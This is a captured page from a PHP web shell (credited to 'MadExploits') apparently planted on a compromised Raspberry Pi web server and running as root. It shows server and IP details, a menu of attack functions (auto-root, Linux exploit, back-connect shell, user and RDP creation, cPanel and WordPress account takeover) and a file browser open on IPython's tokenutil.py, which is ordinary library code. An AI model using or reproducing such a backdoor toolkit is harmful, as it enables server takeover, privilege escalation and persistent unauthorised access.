Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Can't Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
IPython /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
PyColorize.py
12.09
KB
-rw-r--r--
__init__.py
0
B
-rw-r--r--
_get_terminal_size.py
4.31
KB
-rw-r--r--
_process_cli.py
2.36
KB
-rw-r--r--
_process_common.py
7.36
KB
-rw-r--r--
_process_posix.py
8.7
KB
-rw-r--r--
_process_win32.py
6.33
KB
-rw-r--r--
_process_win32_controller.py
20.91
KB
-rw-r--r--
_signatures.py
28.96
KB
-rw-r--r--
_sysinfo.py
46
B
-rw-r--r--
_tokenize_py2.py
16.75
KB
-rw-r--r--
_tokenize_py3.py
22.05
KB
-rw-r--r--
capture.py
5.1
KB
-rw-r--r--
colorable.py
825
B
-rw-r--r--
coloransi.py
6.79
KB
-rw-r--r--
contexts.py
1.93
KB
-rw-r--r--
daemonize.py
148
B
-rw-r--r--
data.py
1.17
KB
-rw-r--r--
decorators.py
2.02
KB
-rw-r--r--
dir2.py
2.07
KB
-rw-r--r--
encoding.py
2.8
KB
-rw-r--r--
eventful.py
164
B
-rw-r--r--
frame.py
3.09
KB
-rw-r--r--
generics.py
740
B
-rw-r--r--
importstring.py
1.01
KB
-rw-r--r--
io.py
7.65
KB
-rw-r--r--
ipstruct.py
11.59
KB
-rw-r--r--
jsonutil.py
134
B
-rw-r--r--
localinterfaces.py
155
B
-rw-r--r--
log.py
149
B
-rw-r--r--
module_paths.py
3.57
KB
-rw-r--r--
openpy.py
8.26
KB
-rw-r--r--
path.py
14.05
KB
-rw-r--r--
pickleutil.py
130
B
-rw-r--r--
process.py
2.87
KB
-rw-r--r--
py3compat.py
10.57
KB
-rw-r--r--
rlineimpl.py
2.65
KB
-rw-r--r--
sentinel.py
421
B
-rw-r--r--
shimmodule.py
2.74
KB
-rw-r--r--
signatures.py
332
B
-rw-r--r--
strdispatch.py
1.79
KB
-rw-r--r--
sysinfo.py
5.08
KB
-rw-r--r--
syspathcontext.py
2.11
KB
-rw-r--r--
tempdir.py
4.67
KB
-rw-r--r--
terminal.py
3.35
KB
-rw-r--r--
text.py
22.95
KB
-rw-r--r--
timing.py
3.99
KB
-rw-r--r--
tokenize2.py
160
B
-rw-r--r--
tokenutil.py
3.77
KB
-rw-r--r--
traitlets.py
168
B
-rw-r--r--
tz.py
1.32
KB
-rw-r--r--
ulinecache.py
1.58
KB
-rw-r--r--
version.py
1.2
KB
-rw-r--r--
warn.py
1.69
KB
-rw-r--r--
wildcard.py
4.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tokenutil.py
"""Token-related utilities""" # Copyright (c) IPython Development Team. # Distributed under the terms of the Modified BSD License. from __future__ import absolute_import, print_function from collections import namedtuple from io import StringIO from keyword import iskeyword from . import tokenize2 from .py3compat import cast_unicode_py2 Token = namedtuple('Token', ['token', 'text', 'start', 'end', 'line']) def generate_tokens(readline): """wrap generate_tokens to catch EOF errors""" try: for token in tokenize2.generate_tokens(readline): yield token except tokenize2.TokenError: # catch EOF error return def line_at_cursor(cell, cursor_pos=0): """Return the line in a cell at a given cursor position Used for calling line-based APIs that don't support multi-line input, yet. Parameters ---------- cell: str multiline block of text cursor_pos: integer the cursor position Returns ------- (line, offset): (text, integer) The line with the current cursor, and the character offset of the start of the line. """ offset = 0 lines = cell.splitlines(True) for line in lines: next_offset = offset + len(line) if next_offset >= cursor_pos: break offset = next_offset else: line = "" return (line, offset) def token_at_cursor(cell, cursor_pos=0): """Get the token at a given cursor Used for introspection. Function calls are prioritized, so the token for the callable will be returned if the cursor is anywhere inside the call. 
Parameters ---------- cell : unicode A block of Python code cursor_pos : int The location of the cursor in the block where the token should be found """ cell = cast_unicode_py2(cell) names = [] tokens = [] call_names = [] offsets = {1: 0} # lines start at 1 for tup in generate_tokens(StringIO(cell).readline): tok = Token(*tup) # token, text, start, end, line = tup start_line, start_col = tok.start end_line, end_col = tok.end if end_line + 1 not in offsets: # keep track of offsets for each line lines = tok.line.splitlines(True) for lineno, line in zip(range(start_line + 1, end_line + 2), lines): if lineno not in offsets: offsets[lineno] = offsets[lineno-1] + len(line) offset = offsets[start_line] # allow '|foo' to find 'foo' at the beginning of a line boundary = cursor_pos + 1 if start_col == 0 else cursor_pos if offset + start_col >= boundary: # current token starts after the cursor, # don't consume it break if tok.token == tokenize2.NAME and not iskeyword(tok.text): if names and tokens and tokens[-1].token == tokenize2.OP and tokens[-1].text == '.': names[-1] = "%s.%s" % (names[-1], tok.text) else: names.append(tok.text) elif tok.token == tokenize2.OP: if tok.text == '=' and names: # don't inspect the lhs of an assignment names.pop(-1) if tok.text == '(' and names: # if we are inside a function call, inspect the function call_names.append(names[-1]) elif tok.text == ')' and call_names: call_names.pop(-1) tokens.append(tok) if offsets[end_line] + end_col > cursor_pos: # we found the cursor, stop reading break if call_names: return call_names[-1] elif names: return names[-1] else: return ''
Close